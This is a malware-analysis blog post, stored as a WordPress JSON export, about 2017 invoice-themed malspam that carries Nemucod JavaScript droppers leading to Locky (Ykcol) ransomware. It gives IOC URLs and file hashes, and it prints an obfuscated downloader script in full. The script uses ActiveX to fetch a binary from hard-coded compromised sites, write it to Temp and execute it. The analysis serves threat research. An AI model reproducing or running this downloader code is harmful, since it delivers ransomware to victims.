{"id":996,"date":"2017-10-03T13:59:52","date_gmt":"2017-10-03T12:59:52","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=996"},"modified":"2017-10-03T13:59:52","modified_gmt":"2017-10-03T12:59:52","slug":"2017-10-03-nemucod-maldoc-leads-to-locky-ykcol-infection","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=996","title":{"rendered":"2017-10-03 Nemucod Maldoc Leads to Locky (Ykcol) Infection"},"content":{"rendered":"

Quick post for today. I have been seeing a lot of malspam with malicious Javascript attachments zipped inside a 7zip archive for the past couple of days. The emails themselves all seem to revolve around the theme of a receipt or invoice as seen below. From what I can tell, the scripts are all about the same and the binary downloaded from each of the sites are exactly the same file. I am not sure if this is the case with the other emails from yesterday or the day before, but I can only assume it is. <\/p>\n

All the scripts from the batch that I obtained along with the malicious binary files from the URLs that were still working are posted in my Github which you can find here<\/a>.<\/p>\n

\"\"<\/a><\/p>\n

IOCs:
\n=====
\nhxxp:\/\/bridleridgehorses[.]com\/jhgf54y6??QDPriSzAYm=QDPriSzAYm
\nhxxp:\/\/pesonamas[.]co[.]id\/jhgf54y6??QDPriSzAYm=QDPriSzAYm
\nhxxp:\/\/aimonino[.]info\/p66\/jhgf54y6?QDPriSzAYm=QDPriSzAYm<\/p>\n

hxxp:\/\/bridleridgehorses[.]com\/jhgf54y6??kJPCDso=kJPCDso
\nhxxp:\/\/pesonamas[.]co[.]id\/jhgf54y6??kJPCDso=kJPCDso
\nhxxp:\/\/aimonino[.]info\/p66\/jhgf54y6?kJPCDso=kJPCDso<\/p>\n

hxxp:\/\/bibtic[.]net\/jhgf54y6??twMGpm=twMGpm
\nhxxp:\/\/enixgaming[.]de\/jhgf54y6??twMGpm=twMGpm
\nhxxp:\/\/aimonino[.]info\/p66\/jhgf54y6?twMGpm=twMGpm<\/p>\n

hxxp:\/\/sonucbirebiregitim[.]com\/jhgf54y6??nuRagkR=nuRagkR
\nhxxp:\/\/bibtic[.]net\/jhgf54y6??nuRagkR=nuRagkR
\nhxxp:\/\/aimonino[.]info\/p66\/jhgf54y6?nuRagkR=nuRagkR<\/p>\n

hxxp:\/\/fbl[.]com[.]sg\/jhgf54y6??WHQaPtXLDg=WHQaPtXLDg
\nhxxp:\/\/kitami-ansin[.]com\/jhgf54y6??WHQaPtXLDg=WHQaPtXLDg
\nhxxp:\/\/aimonino[.]info\/p66\/jhgf54y6?WHQaPtXLDg=WHQaPtXLDg<\/p>\n

Artifacts:
\n==========
\nFile name: da3a2a61-7776-4ecd-a336-2877bd8a7284.js
\nFile size: 15KB
\nFile path: NA
\nMD5 hash: 56947C09717C6D5E6ED82EC5871C24AD
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/ccf179d93cbe54f4e3c9c1343f49c21d397e7f5a499efef5e280f4746f2c0981\/detection<\/a>
\nDetection ratio: 17 \/ 59
\nFirst detected: 2017-10-03 08:35:10
\nReverse.IT: http:\/\/www.reverse.it\/sample\/ccf179d93cbe54f4e3c9c1343f49c21d397e7f5a499efef5e280f4746f2c0981?environmentId=100<\/a><\/p>\n

File name: WHQaPtXLDg2.exe
\nFile size: 577KB
\nFile path: C:\\Users\\%username%\\AppData\\Local\\Temp
\nMD5 hash: 358eaa145a5214c25c82de30c928543a
\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/811631d9c535035ed772ad669aa00a3a3a3e89fc26c5ef63a0f3d9c85eabe81f\/detection<\/a>
\nDetection ratio: 15 \/ 66
\nFirst detected: 2017-10-03 09:56:25
\nReverse.IT: http:\/\/www.reverse.it\/sample\/811631d9c535035ed772ad669aa00a3a3a3e89fc26c5ef63a0f3d9c85eabe81f?environmentId=100<\/a><\/p>\n

Analysis:
\n=========
\nAll the emails are also spoofed so it looks like someone from within the organization is sending it. The attachments all seem to be similarly named. In today’s batch of emails, they all start with “A_.7z”. Several that I saw from yesterday and the day before all seem to copy this type of naming convention as well (some random letter and then underscore with random numbers in a random length.7z). <\/p>\n

\"\"<\/a><\/p>\n

Like all other forms of encrypting malware, this is a pretty straight-forward infection. Once the user extracts the zip file, they are presented with a Javascript file. Unfortunately I am not versed with Javascript so I was not able to deobfuscate the script. Here is an example of one of the scripts.<\/p>\n

\r\n function  setRH(CR, VR){\r\n CR[VR]("User"+"-Agent", "TW96aWxsYS80LjAgKAMASKGNvbXBhdGlibGU7IE1TSUUgNi4wOyKAMASBXaW5kb3dzIE5UIDUuMCk=".acetilenButan());\r\n}\r\n\r\n\r\n\r\n\r\nvar PotterGaablebodied_SayNoNo ="KAMAS"+ ""+"";\r\nvar silkopil = "\/";\r\n\r\n\r\n\r\n var meuArData = new Array(\r\n52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,115,52,52,52,116,105,106,107,108,109,110,111,112,113,114,52,52,52,52,52,52,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,52,52,52,52,52,52,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52,52\r\n\r\n\r\n);\r\n\r\n\r\n  dirtyGog = {'U':'S' , ':':'.' , '88':'' , 'CHICHA':'onseBody' , '77':'' , '101':'' , 'SEREDINA':'X',  '11':''};\r\n\r\nfunction  PotterGaablebodied_FROG2sud(vardos){\r\nreturn vardos[("PotterGaablebodied_front","PotterGaablebodied_borough","PotterGaablebodied_inert","PotterGaablebodied_disclose","PotterGaablebodied_textiles","l")+"en" +("PotterGaablebodied_burthen","PotterGaablebodied_unconcealed","PotterGaablebodied_liberia","PotterGaablebodied_reedy","PotterGaablebodied_hexameter","gt")+"h"];\r\n}var birdMAN =1 + 0xfd +1;\r\n var meuArDataHO = PotterGaablebodied_FROG2sud(meuArData);\r\n\r\n\r\n    for (velVITK_OBLOM= 0; meuArDataHO >velVITK_OBLOM ; ++velVITK_OBLOM) {\r\n       meuArData[velVITK_OBLOM] = -50+meuArData[velVITK_OBLOM] - 3;\r\n\r\n    }\r\n\r\n\tvar dirtyGog;\r\n var velVITK_BOSKO_2S = "";\r\n \r\n \r\nvar proto = "prot"+"otype";\r\nvar ft11 =  function() {\r\n\tvar PotterGaablebodied_RazlomSS, line4, PotterGaablebodied_Selection1, PotterGaablebodied_FROG2c4;\r\n\r\n     var PotterGaablebodied_FROG2out = "";\r\n\r\n\t var line3= this.replace(\/KAMAS\/gi, PotterGaablebodied_FROG2out);line6 = 0;\r\n var  PotterGaablebodied_FROG2len = PotterGaablebodied_FROG2sud(line3); \r\nwhile (line6 < PotterGaablebodied_FROG2len) {\t\r\n\r\n\t\r\ndo {\r\n\t\t\t var PotterGaablebodied_koch = line3.charCodeAt(line6++) &(0x132- 0x33);\r\n            PotterGaablebodied_RazlomSS = meuArData[PotterGaablebodied_koch];\r\n        } while (line6 < PotterGaablebodied_FROG2len && PotterGaablebodied_RazlomSS == -1);   \r\nif (PotterGaablebodied_RazlomSS == -1)\r\n            break; \t\r\n\tdo {\r\n\t\t\t\tstembl = "the";\r\n            line4 = meuArData[line3.charCodeAt(line6++) & birdMAN];\r\n\r\n        } while (line6 < PotterGaablebodied_FROG2len && line4 == -1);  \r\n\r\n        if (line4 +2+1== 1+1)\r\n            break; \r\n\t\r\n        PotterGaablebodied_FROG2out += String.fromCharCode((PotterGaablebodied_RazlomSS << 2) | ((line4 & 0x30) >> 4)); \r\n    do {\r\n            PotterGaablebodied_Selection1 = line3.charCodeAt(line6++) & 0xff;\r\n\r\n            if (PotterGaablebodied_Selection1 == 61)\r\n                return PotterGaablebodied_FROG2out;\r\n\r\n            PotterGaablebodied_Selection1 = meuArData[PotterGaablebodied_Selection1];\r\n        } while (line6 < PotterGaablebodied_FROG2len && PotterGaablebodied_Selection1 == -1); \r\n        if (PotterGaablebodied_Selection1 == -1)\r\n            break;\r\n        PotterGaablebodied_FROG2out += String.fromCharCode(((line4 & (0xe+1)) << 4) | ((PotterGaablebodied_Selection1 & 0x3c) >> 2)); \r\n   \r\n        do {\r\n            PotterGaablebodied_FROG2c4 = line3.charCodeAt(line6++) & birdMAN;\r\n\r\n            if (PotterGaablebodied_FROG2c4 == 61)\r\n                return PotterGaablebodied_FROG2out;\r\n\r\n            PotterGaablebodied_FROG2c4 = meuArData[PotterGaablebodied_FROG2c4];\r\n        } while (line6 < PotterGaablebodied_FROG2len && PotterGaablebodied_FROG2c4 == -1);\r\n        if (PotterGaablebodied_FROG2c4 == -1)\r\n            break;\r\n\r\n        PotterGaablebodied_FROG2out += String.fromCharCode(((PotterGaablebodied_Selection1 & 0x03) << 6) | PotterGaablebodied_FROG2c4); \r\n     \r\n  \r\n  \r\n\r\n\r\n  \r\n\t }\r\n    return PotterGaablebodied_FROG2out;\r\n     };\t\r\n  \r\n \r\n\r\nfunction  PotterGaablebodied_FROG2undefilled(rx, ry) {\r\n    rx =HCKD \/ RDMP ;\r\n    ry = velVLUMAHZZ + 109;\r\n};\r\n\r\n PotterGaablebodied_FROG2undefilled.dEDWWEE = function(){\r\n\r\nPotterGaablebodied_FROG2ok(PotterGaablebodied_FROG2spyFunction1.PotterGaablebodied_FROG2calledWith(), "Function called without arguments");\r\nPotterGaablebodied_FROG2publisher.PotterGaablebodied_FROG2publish(this.PotterGaablebodied_FROG2type1, "PROPER1");\r\n    PotterGaablebodied_FROG2ok(PotterGaablebodied_FROG2spyFunction1.PotterGaablebodied_FROG2calledWith("PROPER1"), "Function called with 'PROPER1' argument");\r\n\r\n    PotterGaablebodied_FROG2publisher.PotterGaablebodied_FROG2publish(this.PotterGaablebodied_FROG2type1, ["PROPER1", "PROPER2"]);\r\n\r\n};\r\n \r\n \r\n \r\n\r\n\t\r\nString["prototype"].acetilenButan =ft11;\r\n  function Gashish(SOcksRadFROGvostochniy){\r\n\t SOcksRadPUPPYna = SOcksRadFROGvostochniy;\r\nfor (var SOcksRadFROG2XCOP in dirtyGog){\r\n\tSOcksRadPUPPYna = SOcksRadPUPPYna["repl" + "ace"](SOcksRadFROG2XCOP, dirtyGog[SOcksRadFROG2XCOP]);\r\n\t\r\n}\r\n    return SOcksRadPUPPYna;\r\n };\r\n\t \r\n var topSecretLine;\r\n var PotterGaablebodied_LLL0LLL = "l";\r\n\r\n \r\n\t var PotterGaablebodied_FROG2TRUEFALSE=("V2lKAMASuZG93cyBTY3JpcKAMASHQgSG9zdA=KAMAS=".acetilenButan() +"MPO203ZDD" =="KAMASV2lKAMASuZG93cyBTY3JpcKAMASHQgSG9zdA==".acetilenButan() +"MPO203ZDD")&&typeof(PotterGaablebodied_FROG2GzEAPd)==="undefined";\r\n\r\n  var PotterGaablebodied_FROGsrq = "UmVxdWVzdEhlYWRlcg==".acetilenButan();\r\n\r\n var PotterGaablebodiedFPADRML  =("").acetilenButan();\r\n var PotterGaablebodied_FROG2lidgen = "QWN0KAMASaXZlWEKAMAS9iamVjdA==".acetilenButan();\r\n \r\n var PotterGaablebodied_FROG2chosen = Math.round(0.7 * 2 - 0.4);\r\n \r\n \r\n var takeshiKitana = new Function("KAMAS,KAMAS2", "KAMAS[KAMAS2]();");\r\n\r\nif(!PotterGaablebodied_FROG2TRUEFALSE){\r\nPotterGaablebodied_FROG2undefilled.scale = function(PotterGaablebodied_FROG2p, PotterGaablebodied_FROG2scaleX, PotterGaablebodied_FROG2scaleY) {\r\n    if (line6sObject(PotterGaablebodied_FROG2scaleX)) {\r\n        PotterGaablebodied_FROG2scaleY = PotterGaablebodied_FROG2scaleX.y;\r\n        PotterGaablebodied_FROG2scaleX = PotterGaablebodied_FROG2scaleX.x;\r\n    } else if (!line6sNumber(PotterGaablebodied_FROG2scaleY)) {\r\n        PotterGaablebodied_FROG2scaleY = PotterGaablebodied_FROG2scaleX;\r\n    }\r\n    return new PotterGaablebodied_FROG2undefilled(PotterGaablebodied_FROG2p.x * PotterGaablebodied_FROG2scaleX, PotterGaablebodied_FROG2p.y * PotterGaablebodied_FROG2scaleY);\r\n};\r\n\r\n}\r\n\r\nfunction  PotterGaablebodiedFPADZO_ZO(TT){\r\n\t\r\neval(TT);\r\n\t}\r\n \t\r\nif(!PotterGaablebodied_FROG2TRUEFALSE){\r\nPotterGaablebodied_FROG2undefilled.PotterGaablebodied_FROG2sameOrN = function(PotterGaablebodied_FROG2param1, PotterGaablebodied_FROG2param2) {\r\n    return PotterGaablebodied_FROG2param1.D == PotterGaablebodied_FROG2param2.D || PotterGaablebodied_FROG2param1.F == PotterGaablebodied_FROG2param2.F;\r\n};\r\n\r\nPotterGaablebodied_FROG2undefilled.angle = function(PotterGaablebodied_FROG2p) {\r\n    return Math.atan2(PotterGaablebodied_FROG2p.y, PotterGaablebodied_FROG2p.x);\r\n};\r\n\t}\r\n\r\n    \r\n var PotterGaablebodied_FROG2VARDOCF ="JVRFKAMASTVAlKAMAS".acetilenButan();\r\n\r\n var oLDNameCreator = new Function("KAMAS,KAMAS","topSecretLine = "+   ("bmV3IEZ1bmN0aW9uKCd2VlJFQkZGMycsJ3JldHVybiBcIlRWTT1cIg==").acetilenButan() + ".acetilenButan();');");\r\n\r\n var PotterGaablebodiedruchka ="RXhwYW5KAMASkRW52aXJvbm1lbnRTdHJKAMASpbmKAMASdz".acetilenButan();\r\n \r\n  var PotterGaablebodied_FROGhatershaha = "";\r\n var PotterGaablebodied_FROGodnoklass = "WHQaPtXLDg";\r\nfunction  placeHolder(AOn){\r\n\treturn new ActiveXObject(AOn);\r\n}\r\n var PotterGaablebodied_FROG2Native = function(options){\r\n\t\r\n};\r\n\r\nif(WSH){PotterGaablebodied_FROG2Native.line6mplement = function(PotterGaablebodied_FROG2objects, PotterGaablebodied_FROG2properties){\r\n\tfor ( var line6 = 0, PotterGaablebodied_FROG2l = PotterGaablebodied_FROG2objects.length; line6 < PotterGaablebodied_FROG2l; line6++) PotterGaablebodied_FROG2objects[line6].line6mplement(PotterGaablebodied_FROG2properties);\r\n};\r\n\toLDNameCreator();\r\n}\r\n\r\n\t\r\n\t\r\n\r\n\r\n var PotterGaablebodied_FROG2d7 ="WA==".acetilenButan() +  "M" +"L";\r\n \r\n\r\n var PotterGaablebodied_FROG2_bChosteck =  "aHR0cDovLwKAMAS=KAMAS=";\r\n\t\r\n \r\nfunction  PotterGaablebodied_FROG2_bCho(T, D, C) {\r\n\tR =D +"";\r\nT[D+""](C);\r\n}\r\n\r\nPotterGaablebodied_FROG2d7 = topSecretLine() + PotterGaablebodied_FROG2d7+ Gashish(("PotterGaablebodied_inquisitiveness","PotterGaablebodied_ethiopia","PotterGaablebodied_regional","PotterGaablebodied_origins","PotterGaablebodied_inane","2.")+"SEREDINAML77H101T"+"TP45KAMAS45"+"WS"+"cr"+"ipt:Uh")+"e"+"ll"; \r\n\r\n var PotterGaablebodied_FROG2DoUtra = [PotterGaablebodied_FROG2lidgen, PotterGaablebodiedruchka,PotterGaablebodied_FROG2VARDOCF,"LmVKAMAS4ZQ=KAMAS=".acetilenButan(), "UnKAMASVuKAMAS".acetilenButan(),PotterGaablebodied_FROG2d7];\r\n\r\nPotterGaablebodied_FROG2Richters=PotterGaablebodied_FROG2DoUtra.shift();\r\n var PotterGaablebodied_FROG2d2=PotterGaablebodied_FROG2DoUtra.pop();\r\nPotterGaablebodied_FROG2fabled="Selection2Action";\r\n var PotterGaablebodied_FROG2LitoyDISK=ActiveXObject;\r\n\r\n \r\n  \t var massMarket=PotterGaablebodied_FROG2d2.split("45");PotterGaablebodied_FROG2Native.PotterGaablebodied_FROG2typize=function(a,b){a.type||(a.type=function(a){return PotterGaablebodied_FROG2$type(a)===b})};\r\n\r\nPotterGaablebodied_FROGcccomeccc = "p";\r\n var Limbus2000=new Function("HORN",' var GALAXY = "chastity necessarily()";var kelso = "ADODB.Str32"; return kelso.replace("DILBO", "D").replace("32", "eam");');\t\r\n \r\n\r\nfunction  x3fx3d(rdf){\r\n\treturn  "\\x3F"+rdf+"\\x3D";\r\n}\r\n function  PotterGaablebodied_FROG2_cCho(a,b,c,d){a[b](c,d)}\r\nabtest = massMarket[PotterGaablebodied_FROGcccomeccc + "op"]();\r\n var PotterGaablebodiedGooodName;\r\n \r\n\r\n function  mimimix2(){\r\n\t try{\r\n         ori_sel[fixed] = 0;      \/* Convert to face format*\/     \/* Mapping from permutation\/orientation to facelet*\/  for( var i = 0; i < 8; i++){       for( var j = 0; j < 3; j++)         posit[pos[i][(ori_sel[i] + j) % 3]] = fmap[perm_sel[i]][j];     }\r\n\t }catch(exc1){\r\n\t\t   \r\n\t }\r\n\t PotterGaablebodiedGooodName = "b3BlbgKAMAS=KAMAS=".acetilenButan();\r\n}\r\n\r\n\r\n PotterGaablebodiedSeason3 = placeHolder(abtest);\r\n\r\n\r\n\r\nmimimix2();\r\nPotterGaablebodied_FROGletchikva=new ActiveXObject(massMarket[0]);\r\nPotterGaablebodied_FROG2tudabilo1 = "s";\r\neval(PotterGaablebodied_SayNoNo.acetilenButan());\r\nvar PotterGaablebodied_FROG2vulture = PotterGaablebodiedSeason3[PotterGaablebodied_FROG2DoUtra.shift()](PotterGaablebodied_FROG2DoUtra.shift());\r\nPotterGaablebodied_FROG2weasel = "G\\x45T";\r\n var PotterGaablebodied_FROG2SIDRENKOV = PotterGaablebodied_FROG2DoUtra.shift();\r\n\r\n   PotterGaablebodied_FROG2SPASPI = "type";\r\n\t\t\t\r\n var PotterGaablebodied_selectionPipe = PotterGaablebodied_FROG2DoUtra.shift();\r\n\t\r\nfunction  PotterGaablebodied_FROG2_aCho(R, K) {\r\nR[K]();\r\n}\t\r\nfunction  PotterGaablebodiedcomBAT(PotterGaablebodied_FROG2gutter, PotterGaablebodied_FROG2StrokaParam2) {\r\n\t         var PotterGaablebodiedWasechO = ""+ PotterGaablebodied_FROG2vulture;\r\ntry{\r\n \r\nPotterGaablebodiedWasechO=PotterGaablebodiedWasechO+silkopil;\r\n\r\nPotterGaablebodiedWasechO=PotterGaablebodiedWasechO +""+ PotterGaablebodied_FROG2StrokaParam2 ;\r\n  \r\n\t\r\n\r\nPotterGaablebodied_FROGletchikva["open"](PotterGaablebodied_FROG2weasel, PotterGaablebodied_FROG2gutter, false);\r\nif(PotterGaablebodied_FROG2TRUEFALSE){  PotterGaablebodied_FROG2_cCho(PotterGaablebodied_FROGletchikva,"set"+(11,"PotterGaablebodied_nickel","PotterGaablebodied_killing","PotterGaablebodied_lucrative","PotterGaablebodied_marion","PotterGaablebodied_illegal","PotterGaablebodied_carboniferous","PotterGaablebodied_tanker",PotterGaablebodied_FROGsrq),"User-Agent","TW96aWxsYS80LjAgKAMASKGNvbXBhdGlibGU7IE1TSUUgNi4wOyKAMASBXaW5kb3dzIE5UIDUuMCk=".acetilenButan());\r\n\t\r\n\t  } \r\n\t  \r\n\t  vlogTry = "11"\r\nPotterGaablebodied_FROGletchikva[PotterGaablebodied_FROG2tudabilo1 + ("PotterGaablebodied_manoeuvre","PotterGaablebodied_clause","PotterGaablebodied_grass","PotterGaablebodied_database","PotterGaablebodied_current","en") + "" + "d"]();\r\n\t\r\n      \r\n var kuzut = PotterGaablebodied_FROGletchikva["Re"+"sp"+(PotterGaablebodied_FROG2StrokaParam2,"PotterGaablebodied_subheading","PotterGaablebodied_fabled","PotterGaablebodied_lassie","PotterGaablebodied_sixtyseven",1123,dirtyGog['CHICHA'])];\r\n\r\n\/\/if(kuzut < 29989)return false;\r\n\/\/\t\tif (kuzut[0]!= 77 || kuzut[1]!= 90)return false;\r\n    \t\tvar PotterGaablebodied_MainZ = new PotterGaablebodied_FROG2LitoyDISK(Limbus2000());\r\n    \r\n\tif (PotterGaablebodied_FROG2TRUEFALSE) {\t\r\n\r\n\t\r\n PotterGaablebodied_FROGGaSMa = "Selection10Action";\r\n\t\r\n var takeshiKitana2 = new Function("KAMAS,KAMAS2", "KAMAS['wr"+"ite'](KAMAS2);");\t\r\n\t\t\ttakeshiKitana(PotterGaablebodied_MainZ,PotterGaablebodiedGooodName);\t \r\nPotterGaablebodied_MainZ[PotterGaablebodied_FROG2SPASPI] = PotterGaablebodied_FROG2chosen;\r\n\t\r\n       \ttakeshiKitana2( PotterGaablebodied_MainZ, kuzut);\t\t \r\n \r\n\t\t  PotterGaablebodied_FROG2XWaxeQhw = "Selection11Action";\r\n        PotterGaablebodied_MainZ["position"] = 0;\r\n\t  PotterGaablebodied_FROG2krDwvrh = "Selection12Action";\r\n\t\tPotterGaablebodiedWasechO = PotterGaablebodiedWasechO  + PotterGaablebodied_FROG2SIDRENKOV;\r\n\t\tPotterGaablebodied_MainZ["cKAMAS2F2KAMASZVKAMASRvRmlsZQ==".acetilenButan()](PotterGaablebodiedWasechO, 26\/13);\r\n        PotterGaablebodied_FROG2SswQdi = "Selection13Action";\r\n\t\t\r\n\t\t  \r\n        PotterGaablebodied_MainZ.close();\r\n\r\n\t\t\r\nPotterGaablebodiedSeason3[PotterGaablebodied_selectionPipe ](PotterGaablebodiedWasechO,0,false);\r\n\r\n\t}\r\n\r\n}catch(exception4){\r\n\t\r\n\treturn false;}\r\n\t\r\n\t\t\r\nreturn true;\r\n};\t\t\r\n \r\n \t\r\n\t\t\r\nPotterGaablebodiedFPADZO_ZO(PotterGaablebodiedFPADRML);\r\n\t\t\t\r\n\r\n\t\r\n var PotterGaablebodied_FROGodnoklassYO = 1;\r\n\r\n\r\n var PotterGaablebodied_FROG2_a5 = ('KAMASZmJsLmNvbS5zZy9qaGdmNTR5Nj8KAMAS=SSSSKAMASa2l0YW1pLWFuc2luLmNKAMASvbS9qaGdmNTR5Nj8=SSSS'+'YWltb25pbm8uaW5mby9wNjYvamhnZjU0eTY='+'KAMAScGVzb25hbWFKAMASzLmNvLmlkL2poZ2Y1NHk2Pw==SSSSSSSSKAMAS').split("SSSS");  \r\n\r\n var KAMAS500 = new Function("PotterGaablebodied_FROG2_a5,PotterGaablebodied_FROG2HORDA5", 'return PotterGaablebodied_FROG2_bChosteck.acetilenButan() + PotterGaablebodied_FROG2_a5[PotterGaablebodied_FROG2HORDA5].acetilenButan();');\r\n\r\n\r\n \r\nfor(PotterGaablebodied_FROG2HORDA5 in PotterGaablebodied_FROG2_a5){\r\n\tPotterGaablebodied_FROGodnoklassYO++;\r\n\tvar s1=KAMAS500(PotterGaablebodied_FROG2_a5,PotterGaablebodied_FROG2HORDA5)+x3fx3d(PotterGaablebodied_FROGodnoklass)+PotterGaablebodied_FROGodnoklass;\r\n\tvar sDA2=PotterGaablebodied_FROGodnoklass+ PotterGaablebodied_FROGodnoklassYO;\r\n\tif(PotterGaablebodiedcomBAT(s1,sDA2)){\r\nbreak;\r\n}\r\n\r\n\r\n}<\/pre>\n
Once the Javascript file is executed, the script chooses one of the three URLs that is coded into the it and downloads the malicious binary. In this case I used a tool called URLRevealer<\/a> from Kahu Security which created a local proxy server that logged all web requests. When I ran the scripts to see what URLs were being used, URLRevealor showed me three different URLs for each script. The only network traffic that I saw from my VM was the GET request for the malicious binary.<\/p>\n
\"\"<\/a><\/p>\n
After the download of the binary and a couple of minutes, I was presented with the usual Locky (Ykcol) screens that we have seen in the past.<\/p>\n
\"\"<\/a><\/p>\n
\"\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Quick post for today. I have been seeing a lot of malspam with malicious Javascript attachments zipped inside a 7zip archive for the past couple of days. The emails themselves all seem to revolve around the theme of a receipt or invoice as seen below. From what I can tell, the scripts are all about the same and the binary downloaded from each of the sites are exactly the same file. I am not sure if this is the case with the other emails from yesterday or the day before, but I can only assume it is. All the scripts…<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[14,15],"class_list":["post-996","post","type-post","status-publish","format-standard","hentry","category-packet-analysis","tag-locky","tag-nemucod"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/996","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=996"}],"version-history":[{"count":4,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/996\/revisions"}],"predecessor-version":[{"id":1005,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/996\/revisions\/1005"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=996"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=996"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=996"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}